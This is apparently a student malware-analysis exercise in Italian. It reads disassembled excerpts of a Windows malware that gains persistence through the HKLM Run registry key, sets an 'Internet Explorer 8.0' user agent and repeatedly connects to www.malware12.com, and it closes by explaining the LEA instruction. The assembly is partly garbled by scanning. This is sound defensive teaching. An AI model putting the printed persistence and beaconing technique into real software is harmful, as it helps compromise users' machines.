# 02/04/2024 Windows malware

Prepared by:

Manuel Buonanno

Organized by:



# Indice

1) Traccia	3
1.1) Codice	
2) Persistenza	
ý 3) Client software	
4) URL	7
5) I FA	

#### **Traccia**

Con riferimento agli estratti di un malware reale presenti nelle prossime slide, rispondere alle seguenti domande:

- Descrivere come il malware ottiene la persistenza, evidenziando il codice assembly dove le relative istruzioni e chiamate di funzioni vengono eseguite;
- Identificare il client software utilizzato dal malware per la connessione ad Internet;
- Identificare l'URL al quale il malware tenta di connettersi ed evidenziare la chiamata di funzione che permette al malware di connettersi ad un URL;
- BONUS: qual è il significato e il funzionamento del comando assembly "lea".

### Codice

```
)040286F
           push
                                   ; samDesired
00402871
           push
                                     ulOptions
                   eax
                   offset SubKey
                                     "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
00402872
           push
00402877
           push
                   HKEY LOCAL MACHINE; hKey
)040287C
           call
                   esi ; RegOpenKeyExW
)040287E
           test
                   eax, eax
00402880
           inz
                   short loc 4028C5
00402882
)0402882 loc 402882:
00402882
           lea
                   ecx, [esp+424h+Data]
00402886
           push
                                   ; lpString
00402887
           mov
                   bl, 1
                   ds:lstrlenW
00402889
           call
           lea
)040288F
                   edx, [eax+eax+2]
00402893
           push
                   edx
                                   ; cbData
00402894
           mov
                   edx,
                       [esp+428h+hKey]
00402898
           lea
                   eax, [esp+428h+Data]
)040289C
           push
                                   ; lpData
                   eax
0040289D
           push
                   1
                                   ; dwType
0040289F
                                   ; Reserved
           push
004028A1
           lea
                   ecx, [esp+434h+ValueName]
                                   ; lpValueName
004028A8
           push
                   ecx
004028A9
           push
                   edx
                                   ; hKey
004028AA
           call
                   ds:RegSetValueExW
.text:00401150
.text:00401150
.text:00401150 : DWORD
                       stdcall StartAddress(LPVOID)
.text:00401150 StartAddress
                               proc near
                                                        ; DATA XREF: sub 401040+ECTo
.text:00401150
                               push
                                       esi
                               push
.text:00401151
                                       edi
.text:00401152
                               push
                                       Ø
                                                         dwFlags
.text:00401154
                                       0
                                                         1pszProxyBypass
                               push
.text:00401156
                                       8
                                                         1pszProxy
                               push
.text:00401158
                                                        ; dwAccessType
                               push
                                                         "Internet Explorer 8.0"
.text:0040115A
                                       offset szAgent
                               push
.text:0040115F
                               call
                                       ds:InternetOpenA
                                       edi, ds:InternetOpenUrlA
.text:00401165
                               MOV
.text:0040116B
                               MOV
                                       esi, eax
.text:0040116D
.text:0040116D loc_40116D:
                                                       ; CODE XREF: StartAddress+301j
.text:0040116D
                               push
                                                       ; dwContext
.text:0040116F
                                       80000000h
                               push
                                                         dwFlags
.text:00401174
                               push
                                       8
                                                         dwHeadersLength
.text:00401176
                               push
                                       Ø
                                                         1pszHeaders
                                                         "http://www.malware12coM
.text:00401178
                                       offset szUrl
                               push
                                                        ; hInternet
.text:0040117D
                               push
                                       esi
.text:0040117E
                                       edi ; InternetOpenUrlA
                               call
                                       short loc_40116D
.text:00401180
                               jmp
.text:00401180 StartAddress
                               endp
.text:00401180
 taut - 881-84408
```

# **Persistenza**

```
0040286F
          push
                                    samDesired
00402871
          push
                                   ; ulOptions
                                   ; "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
                  offset SubKey
00402872
          push
                  HKEY LOCAL MACHINE; hKey
00402877
          push
0040287C
          call
                  esi ; RegOpenKeyExW
```

La chiamata alla funzione RegOpenKeyEx.

I parametri della funzione sono passati sullo stack tramite le istruzioni «push». Con questa funzione il malware accede alla chiave di registro <<Software\\Microsoft\\Windows\\CurrentVersion\\Run>> prima di modificarne il valore.

```
004028A8 push ecx ; lpValueName
004028A9 push edx ; hKey
004028AA call ds:RegSetValueExW
```

La chiamata alla funzione RegSetValueEx.

Anche in questo caso i valori sono passati sullo stack tramite le istruzioni «pushecx» e «pushedx». Tra le altre cose potete vedere come IDA identifichi il nome dei parametri passati alle funzioni. La funzione viene utilizzata dal malware per modificare il valore del registro ed aggiungere una nuova entry in modo tale da ottenere la persistenza all'avvio del sistema operativo.

# **Client software**

Il client utilizzato dal malware per connettersi ad internet è Internet Explorer, più precisamente la versione 8.

```
.text:00401154
                                push
                                                         ; lpszProxyBypass
.text:00401156
                                        8
                                                         ; lpszProxy
                                push
                                        1
.text:00401158
                                push
                                                          dwAccessType
                                                        ; "Internet Explorer 8.0"
.text:0040115A
                                        offset szAgent
                                push
.text:0040115F
                                        ds:InternetOpenA
                                call
                                        edi, ds:InternetOpenUrlA
.text:00401165
                                MOV
.text:0040116B
                                mov
                                        esi. eax
```

## URL

Il malware cerca di connettersi all'URL www.malware12.com. La chiamata di funzione che consente al malware la connessione verso un URL è «InternetOpenURL». L'URL è passato come parametro di questa funzione sullo stack, tramite l'istruzione push.

```
.text:0040116D
                                                           dwContext
                                push
                                        80000000h
.text:0040116F
                                push
                                                           dwFlags
.text:00401174
                                                           dwHeadersLength
                                push
.text:00401176
                                                           1pszHeaders
                                push
                                                           "http://www.malware12com
                                        offset szUrl
.text:00401178
                                push
.text:0040117D
                                                         ; hInternet
                                push
.text:0040117E
                                        edi ; InternetOpenUrlA
                                call
.text:00401180
                                        short loc_40116D
                                jmp
.text:00401180 StartAddress
                                endp
```

#### LEA

Il comando "lea" in assembly, che sta per "Load Effective Address", è utilizzato per caricare l'indirizzo di memoria di una variabile o di una locazione di memoria in un registro. Tuttavia, a differenza di "mov", che copia il valore effettivo, "lea" carica solo l'indirizzo, senza accedere al contenuto effettivo della memoria. Questo rende "lea" utile per calcolare indirizzi di memoria per operazioni successive. Ad esempio, il comando "lea" può essere utilizzato per calcolare l'indirizzo di una variabile e poi usare tale indirizzo in operazioni di accesso alla memoria o di calcolo.